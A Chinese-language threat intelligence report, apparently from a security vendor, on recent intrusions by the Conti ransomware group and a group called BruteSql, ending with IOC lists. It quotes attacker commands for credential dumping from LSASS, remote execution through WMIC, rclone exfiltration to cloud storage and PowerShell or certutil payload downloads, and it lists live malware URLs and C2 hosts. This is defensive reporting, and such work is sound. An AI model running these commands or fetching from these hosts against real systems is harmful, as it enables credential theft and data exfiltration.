概述
Conti Group是现阶段最活跃的勒索团伙之一,根据境外友商cyberint去年的发布的报告[1],Conti Group在2021年成功开展了600次攻击活动,共盈利27亿美元。由于在2022年2月份Conti Group的高管宣称在俄乌战争中站队俄罗斯一侧,导致其内部数据被人在Twitter上公开。
美国《连线》杂志称[2]泄露的聊天记录表明Conti Group与APT29存在临时性的合作。
与之前的文章类似,本文内容也仅仅是对Conti Group在过去半年时间内攻击手法做一个分享。文末会分享该团伙历史使用的IOC,供友商追踪溯源。
Conti Group
命令行 |
cmd.exe /c !uplaod D:UchebkaworkSOFTLSASSlsass.dll -dest C:Windowssystem32lsass.dll |
reg.exe add “HKLMSYSTEMCurrentControlSetServiceslogincontrollNetworkProvider” |
cmd.exe /c dir |
rundll32 C:WindowsSysnativecomsvcs.dll, MiniDump 668 c:windowstemptmpQWER.dmp |
从命令行中可以看到Conti Group攻击者的工作路径,Uchebka经过查询是东欧地区人的姓氏。
Md5 |
文件名 |
0838b1a1618c5ea3137ece85f83686c0 |
lsass.dll |
样本主要功能将系统凭证存储到c:windowstemptmpQWER.tmp文件中。
命令行 |
cmd.exe /c winrs -rlocalhost |
cmd.exe /c WMIC /node:”XXXX” /user:”XXXXXX” /password:”XXXXXX” process call create “c:programdataAnyDesk.exe |
除了Anydesk,攻击者还会植入木马后门,这些样本在代码逻辑层面没有任何同源性,其功能只是内存解密CS载荷并加载。
Md5 |
文件名 |
c914661e98b35630a9abc356f4b24c58 |
rew.dll |
dbb8f2e4225ed6fb09e78493052d50a8 |
Sys.dll |
02953d5f6363896427d09fa112f5da16 |
Wud.dll |
大部分的木马都是无文件,例如我们在一台LDAP服务器上发现了五个注入到系统进程中的CS载荷。
当Conti在内网中找到高价值的服务器后会下发rclone工具拷贝敏感数据。
命令行 |
rclone copy –max-age 3y “XXXXXXXD$” remote:”XXXXXXfilesD” –exclude “*.{iso,pptx,msi,vmdk,pptx.MP4,psd,7z,rar,zip,MOV,FIT,FIL,mp4,mov,mdb,iso,exe,dll,mkv,ova,one}” |
文件目录如下:
Rclone配置文件如下:
攻击者使用匿名邮箱othdripinid1979@protonmail.com注册了MEGA网盘并花了19.99欧元通过比特币支付的方式购买了会员服务。
在其他的攻击活动中Conti Group通过Exchange漏洞启动powershell直接下载CobaltStrike并执行。
命令行 |
powershell /c powershell.exe Invoke-WebRequest -URI |
powershell /c powershell.exe |
下载的BAT内容如下,执行CS后门。
命令行 |
powershell.exe -nop -w hidden -c |
接着安装screenconnect服务,实现远程控制。
ITW |
https://cdn-101.anonfiles.com/xd65J5gdya/088d20aa-1652635603/2.msi |
命令行 |
Cmd /c certutil.exe –urlcache –split |
遗憾的是该命令也被天擎拦截,msi文件会在programdata目录下释放anydesk实现远程控制。
基于CobaltStrike的C2,我们注意到Google TAG团队在2022年5月19日曾发布过一篇名为《Bumblebee Malware from TransferXL URLs》的报告中[5]提到Bumblebee的https流量会先访问amazonAWS服务器接着访问CobaltStrike的域名xenilik.com。
BruteSql Group
命令行 |
cmd /c powershell.exe -nop -w hidden |
cmd.exe /c “echo $client = |
木马信息如下。
Md5 |
文件名 |
72c84779b5862c1462ca0c3da30bde39 |
un8nwhi0.exe |
7d74663288cd910c7dfd00e4e3136a23 |
fkgwcwg.exe |
木马执行过程中会将CobaltStrike注入到系统进程regasm.exe中。C2: 92.255.85.138: 8991。攻击者会通过regasm.exe下发anydesk远程控制,接着会下发一些工具,窃取相关软件的密码。
Md5 |
文件名 |
09078828931a04c2a3f95db7641ce805 |
webbrowserpassview.exe |
264f7b719ce8bc281377582a24eaac69 |
wirelesskeyview64.exe |
28dc8674d8d692ed156998520a5e6303 |
mimikatz.exe |
35861f4ea9a8ecb6c357bdb91b7df804 |
pspv.exe |
36e91497fee355a45a5cb23a5ea91139 |
chromepass.exe |
44bd492dfb54107ebfe063fcbfbddff5 |
rdpv.exe |
4b27c3d57fe01a2a5b2001854507e0e2 |
iepv.exe |
6121393a37c3178e7c82d1906ea16fd4 |
pstpassword.exe |
76b916f3eeb80d44915d8c01200d0a94 |
routerpassview.exe |
782dd6152ab52361eba2bafd67771fa0 |
mailpv.exe |
7f31636f9b74ab93a268f5a473066053 |
bulletspassview64.exe |
d28f0cfae377553fcb85918c29f4889b |
vncpassview.exe |
我们观察到该团伙在2021年主要投递的是global imposter勒索软件,但是到了2022年该团伙开始投递Leakthemall勒索软件。
Md5 |
文件名 |
480d33334909d49d61cb75c536aef1f7 |
360.exe |
Fee16109b05f88040bc7f41e71dd50b5 |
360.exe |
在七月份时我们观察到该团伙开始投递基于Conti源码修改而来的Bluesky勒索软件[6],境外友商将其与Conti Group相关联,由于我们没有获取到更多信息,故暂不做任何结论性的推测。
命令行 |
iex ((New-Object |
总结
目前,基于奇安信威胁情报中心的威胁情报数据的全线产品,包括奇安信威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、奇安信NGSOC、奇安信态势感知等,都已经支持对此类攻击的精确检测。
IOC
Conti Group
MD5:
0838b1a1618c5ea3137ece85f83686c0
c914661e98b35630a9abc356f4b24c58
dbb8f2e4225ed6fb09e78493052d50a8
02953d5f6363896427d09fa112f5da16
C2:
rewujisaf.com
fuvataren.com
xenilik.com
kusayeyixa.com
wudimomo.com
URL:
https://cdn.discordapp.com/attachments/943969145555398739/951446861363961866/7.bat
https://cdn.discordapp.com/attachments/952197064920555553/952197359423606865/New_Text_Document.bat
http://91.213.50.102:80/avadacedavra
http://80.209.241.3:8888/1.msi
https://cdn-101.anonfiles.com/xd65J5gdya/088d20aa-1652635603/2.msi
BruteSql Group
MD5:
72c84779b5862c1462ca0c3da30bde39
7d74663288cd910c7dfd00e4e3136a23
09078828931a04c2a3f95db7641ce805
264f7b719ce8bc281377582a24eaac69
28dc8674d8d692ed156998520a5e6303
35861f4ea9a8ecb6c357bdb91b7df804
36e91497fee355a45a5cb23a5ea91139
44bd492dfb54107ebfe063fcbfbddff5
4b27c3d57fe01a2a5b2001854507e0e2
6121393a37c3178e7c82d1906ea16fd4
76b916f3eeb80d44915d8c01200d0a94
782dd6152ab52361eba2bafd67771fa0
7f31636f9b74ab93a268f5a473066053
d28f0cfae377553fcb85918c29f4889b
480d33334909d49d61cb75c536aef1f7
Fee16109b05f88040bc7f41e71dd50b5
C2:
92.255.85.138: 8991
URL:
http://144.48.240.69/dar.exe
http://92.255.85.138:80/a
https://kmsauto.us/someone/start.ps1
参考链接
[2] https://www.wired.com/story/conti-ransomware-russia/
[3] https://mp.weixin.qq.com/s/A9c4Le-DL8fBEw8hfe1EcQ
[4] https://www.cisa.gov/uscert/ncas/alerts/aa21-265a
[5] https://isc.sans.edu/diary/rss/28664
[6] https://cloudsek.com/threatintelligence/tracking-the-operators-of-the-newly-emerged-bluesky-ransomware/
点击阅读原文至ALPHA 5.0
即刻助力威胁研判
Source: https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g